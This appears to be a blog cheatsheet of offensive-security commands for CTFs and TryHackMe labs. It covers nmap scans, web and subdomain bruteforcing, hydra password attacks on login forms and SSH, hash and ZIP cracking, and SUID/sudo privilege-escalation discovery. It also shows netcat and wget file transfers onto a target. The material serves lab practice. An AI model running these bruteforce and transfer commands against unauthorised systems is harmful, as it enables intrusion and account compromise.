
The Essentials - My Favorite Tools and Commands

by on under cheatsheets

This cheatsheet contains the essential commands I always use in CTFs, THM boxes, and in cybersecurity. It covers commands and tools from discovery to transferring files, passing through web tools and cracking. I encourage other content creators to replicate this kind of cheatsheet on their platform (a mention will always be appreciated 😊).


Discovery

Nmap

Basic nmap scan:

nmap -vv -sC -sV -oN nmap.log $IP

Complete nmap scan:

nmap -vv -A -p- -oN nmap-complete.log $IP

See my nmap cheatsheet for other personal favorites.

Web Directory and Query Parameters Bruteforce

Using gobuster:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.log -t 200 -u $URL

Using wfuzz:

wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/FUZZ

Using wfuzz to bruteforce query parameters:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/?parameter=FUZZ

Recursive directory scan with wfuzz:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 200 --hc 404 -R $DEPTH http://www.host.name/FUZZ

Web

HTTP Form Bruteforce

Using Hydra:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

Using wfuzz (put FUZZ where the password goes in the request body; -d sends it as POST data and --hs hides responses whose content matches the error message):

wfuzz -c -w /usr/share/wordlists/rockyou.txt -d "<Request Body>" --hs "<Error Message>" "<Login Page>"

Wordpress

WPScan + password bruteforce:

wpscan --url $URL --passwords /usr/share/wordlists/rockyou.txt --usernames usernames.txt

Subdomain Bruteforce

Using wfuzz:

wfuzz -c -f wfuzz-sub.log -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u $URL -H "Host: FUZZ.host.name" -t 32 --hc 200 --hw 356

Note: you will need to adjust the --hc and --hw parameters to your needs. Check wfuzz -h for more information about those.

Using gobuster:

gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL -t 32

Cracking

ZIP

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

Hashes

Using hashcat:

hashcat -m $MODE hashes /usr/share/wordlists/rockyou.txt

Bruteforce SSH

Using hydra:

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh

Steganography

Crack a steghide passphrase using stegcracker.

Install:

pip3 install stegcracker

Run:

python3 -m stegcracker tocrack.jpg

Privescs Discovery

Find privescs exploiting SUID binaries:

find / -perm -u=s -type f 2>/dev/null
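As an added example that is not part of the original cheatsheet, the same SUID enumeration turned into a defender's baseline check: it snapshots the setuid/setgid inventory of a tree once and later reports any binary that is not in that known-good list. The function names and the baseline file are this example's own assumptions.

```shell
# Added example, not from the original cheatsheet. The cheatsheet's
# `find / -perm -u=s` enumeration, turned into a defender's check: take a
# known-good inventory of setuid/setgid files once, then report anything
# that later shows up outside it. Function names and the baseline file
# layout are this example's own assumptions.

# List setuid or setgid regular files under $1 (default /), sorted.
# -perm -4000 / -2000 are the octal forms of the cheatsheet's -u=s / -g=s.
# Errors from unreadable directories are discarded, as in the cheatsheet.
suid_inventory() {
  root="${1:-/}"
  find "$root" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Print every path in the current inventory of $1 that is not listed in the
# baseline file $2 (one path per line). Returns 0 when nothing is new and
# 1 when unexpected entries were printed, so it can gate a cron job or CI step.
suid_diff() {
  root="$1"
  baseline="$2"
  if suid_inventory "$root" | grep -vxF -f "$baseline"; then
    return 1
  fi
  return 0
}

# Typical use:
#   suid_inventory / > suid-baseline.txt     # on a freshly built, trusted host
#   suid_diff / suid-baseline.txt            # later; prints anything added
```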

Find privescs by listing sudo permissions:

sudo -l

Enumerate interesting files, processes, and privescs using Linpeas:

  1. Install linpeas on your machine.
  2. Transfer it to the target machine (see the Transferring Files section).
  3. Make it executable, run it, and tee the output to a log file for further analysis.

chmod +x linpeas.sh
./linpeas.sh | tee linpeas.log

Transferring Files

Open an HTTP server:

  1. cd into the directory you want to access one or more files from.
  2. Open an HTTP server:

# PYTHON3
python3 -m http.server -b $IP $PORT

# PHP
php -S $IP:$PORT

  3. Access the file:

# Wget
wget http://$IP:$PORT/file

# Curl
curl http://$IP:$PORT/file -o target_file

# Netcat
nc $IP $PORT > target_file

Using SCP:

# Send
scp /path/to/file user@$HOST:/path/

# Send with custom name
scp /path/to/file user@$HOST:/path/different_name

# Get
scp user@$HOST:/path/to/file /local/directory

Note: To connect with an SSH key, you may need to use the -i flag followed by the path to the key.

Using netcat:

# Server
nc -lp $PORT < file

# Client
nc $IP $PORT > file